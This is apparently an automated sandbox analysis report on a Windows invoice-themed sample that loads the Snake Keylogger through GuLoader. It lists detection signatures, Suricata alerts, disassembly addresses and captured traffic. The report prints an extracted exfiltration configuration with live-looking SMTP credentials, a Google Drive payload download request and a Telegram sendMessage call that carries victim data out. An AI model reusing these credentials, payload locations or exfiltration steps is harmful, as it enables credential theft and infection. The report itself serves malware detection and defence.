Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FACTURAS_1_250075.exe

Overview

General Information

Sample name:FACTURAS_1_250075.exe
Analysis ID:1624624
MD5:40ea152d46891890e84019097ef450bb
SHA1:ea96638903559200bc5cb6a710093ed941b9861b
SHA256:212a64eefc140fd406653b68255c01ffb54b1827f226f63ce4f2b299aa290584
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • FACTURAS_1_250075.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\FACTURAS_1_250075.exe" MD5: 40EA152D46891890E84019097EF450BB)
    • FACTURAS_1_250075.exe (PID: 2932 cmdline: "C:\Users\user\Desktop\FACTURAS_1_250075.exe" MD5: 40EA152D46891890E84019097EF450BB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "calidad@copinsa.com", "Password": "T#wZN*AFHxRq", "Host": "mail.copinsa.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000000.00000002.1917413249.000000000531D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: FACTURAS_1_250075.exe PID: 7468JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        Process Memory Space: FACTURAS_1_250075.exe PID: 2932JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-26T12:35:37.928892+010028033053Unknown Traffic192.168.2.1065195104.21.96.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-26T12:35:35.921606+010028032742Potentially Bad Traffic192.168.2.1065193132.226.247.7380TCP
          2025-02-26T12:35:37.359162+010028032742Potentially Bad Traffic192.168.2.1065193132.226.247.7380TCP
          2025-02-26T12:35:38.687152+010028032742Potentially Bad Traffic192.168.2.1065196132.226.247.7380TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-26T12:35:30.595826+010028032702Potentially Bad Traffic192.168.2.1065190142.250.185.110443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-26T12:35:48.292749+010018100071Potentially Bad Traffic192.168.2.1065210149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000C.00000002.2544138212.0000000036091000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "calidad@copinsa.com", "Password": "T#wZN*AFHxRq", "Host": "mail.copinsa.com", "Port": "587", "Version": "4.4"}
          Multi AV Scanner detection for submitted file
          Source: FACTURAS_1_250075.exeVirustotal: Detection: 70%Perma Link
          Source: FACTURAS_1_250075.exeReversingLabs: Detection: 71%
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E0040 CryptUnprotectData,12_2_380E0040
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_380E0014 CryptUnprotectData,12_2_380E0014
          Source: FACTURAS_1_250075.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:65194 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.10:65190 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.23.97:443 -> 192.168.2.10:65191 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:65210 version: TLS 1.2
          Source: FACTURAS_1_250075.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_00405FFD FindFirstFileA,FindClose,0_2_00405FFD
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559B
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_00405FFD FindFirstFileA,FindClose,12_2_00405FFD
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_00402688 FindFirstFileA,12_2_00402688
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 12_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,12_2_0040559B
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 057FF45Dh12_2_057FF4AC
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 057FF45Dh12_2_057FF2C0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380ED7C8h12_2_380ED4D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E03C8h12_2_380E00F8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380ED19Fh12_2_380ECE30
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EFE08h12_2_380EFB10
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E86FEh12_2_380E8430
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E670Eh12_2_380E6440
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E471Eh12_2_380E4450
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E272Eh12_2_380E2460
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EAB46h12_2_380EA878
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EC34Eh12_2_380EC080
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EEFB0h12_2_380EECB8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E8B67h12_2_380E88C0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E6B9Eh12_2_380E68D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E4BAEh12_2_380E48E0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E2BBEh12_2_380E28F0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EAFD6h12_2_380EAD08
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E8FE6h12_2_380E8D18
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EC7DEh12_2_380EC510
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E702Eh12_2_380E6D60
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E503Eh12_2_380E4D70
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E304Eh12_2_380E2D80
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EF478h12_2_380EF180
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EB466h12_2_380EB198
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EDC90h12_2_380ED998
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E9476h12_2_380E91A8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380ECC6Eh12_2_380EC9A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then mov esp, ebp12_2_380E21C9
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E74BEh12_2_380E71F0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E54CEh12_2_380E5200
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E34DEh12_2_380E3210
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EB8F8h12_2_380EB628
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E9906h12_2_380E9638
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EF940h12_2_380EF648
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EE158h12_2_380EDE60
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E794Eh12_2_380E7680
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E595Eh12_2_380E5690
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E396Eh12_2_380E36A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E9D96h12_2_380E9AC8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E7DDEh12_2_380E7B10
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EE620h12_2_380EE328
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E5DEEh12_2_380E5B20
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E3DFEh12_2_380E3B30
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EA226h12_2_380E9F58
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E826Eh12_2_380E7FA0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E627Eh12_2_380E5FB0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380E428Eh12_2_380E3FC0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EA6B6h12_2_380EA3E8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EBEBEh12_2_380EBBF0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380EEAE8h12_2_380EE7F0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380F2C48h12_2_380F2830
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380FF5DDh12_2_380FF2A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380FC9D1h12_2_380FC728
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380F2681h12_2_380F23D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380F2C48h12_2_380F2826
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380FCEC9h12_2_380FCC20
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_380F0040
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_380F0853
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380FD3C1h12_2_380FD118
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380FD8B9h12_2_380FD610
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380FDD11h12_2_380FDA68
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_380F0673
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380FE169h12_2_380FDEC0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380F0D0Dh12_2_380F0B30
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380F16F8h12_2_380F0B30
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380FE5E9h12_2_380FE340
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380F2C48h12_2_380F2B76
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380FEA41h12_2_380FE798
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 380FEE99h12_2_380FEBF0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B8DE0h12_2_392B8AE8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B4628h12_2_392B4330
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B0800h12_2_392B0508
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B75F9h12_2_392B7300
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B5E10h12_2_392B5B18
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B1658h12_2_392B1360
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B6C68h12_2_392B6970
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B2E40h12_2_392B2B48
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B8450h12_2_392B8158
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B3C98h12_2_392B39A0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B24B0h12_2_392B21B8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B5480h12_2_392B5188
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B62D8h12_2_392B5FE0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B4AF0h12_2_392B47F8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B7AC0h12_2_392B77C8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B0CC8h12_2_392B09D0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B1B20h12_2_392B1828
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B8918h12_2_392B8620
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B7130h12_2_392B6E38
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B3308h12_2_392B3010
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B4160h12_2_392B3E68
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B0338h12_2_392B0040
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B5948h12_2_392B5650
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B67A0h12_2_392B64A8
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B2978h12_2_392B2680
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B1190h12_2_392B0E98
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B7F88h12_2_392B7C90
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B1FE8h12_2_392B1CF0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B4FB8h12_2_392B4CC0
          Source: C:\Users\user\Desktop\FACTURAS_1_250075.exeCode function: 4x nop then jmp 392B37D0h12_2_392B34D8

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:65210 -> 149.154.167.220:443
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficTCP traffic: 192.168.2.10:65000 -> 1.1.1.1:53
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2026/02/2025%20/%2018:30:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
          Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
          Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:65196 -> 132.226.247.73:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:65193 -> 132.226.247.73:80
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:65190 -> 142.250.185.110:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:65195 -> 104.21.96.1:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:65194 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=11EDRzJ-mxr0BLLCWsRXUM3gC-SUgyfg5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2026/02/2025%20/%2018:30:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
